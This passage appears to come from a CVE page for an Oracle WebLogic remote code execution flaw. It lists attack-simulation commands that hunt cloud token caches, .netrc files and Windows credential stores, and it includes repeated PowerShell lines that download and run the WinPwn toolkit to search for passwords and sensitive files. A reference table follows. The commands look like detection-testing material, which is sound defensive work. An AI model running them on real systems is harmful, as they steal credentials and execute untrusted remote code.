find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-14882 |
| oracle.com |
GitHub CVE
x_refsource_MISC
|
https://www.oracle.com/security-alerts/cpuoct2020.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/159769/Oracle-WebLogic-Server-Remote-Code-Execution.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/161128/Oracle-WebLogic-Server-12.2.1.0-Remote-Code-Execution.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-14882 |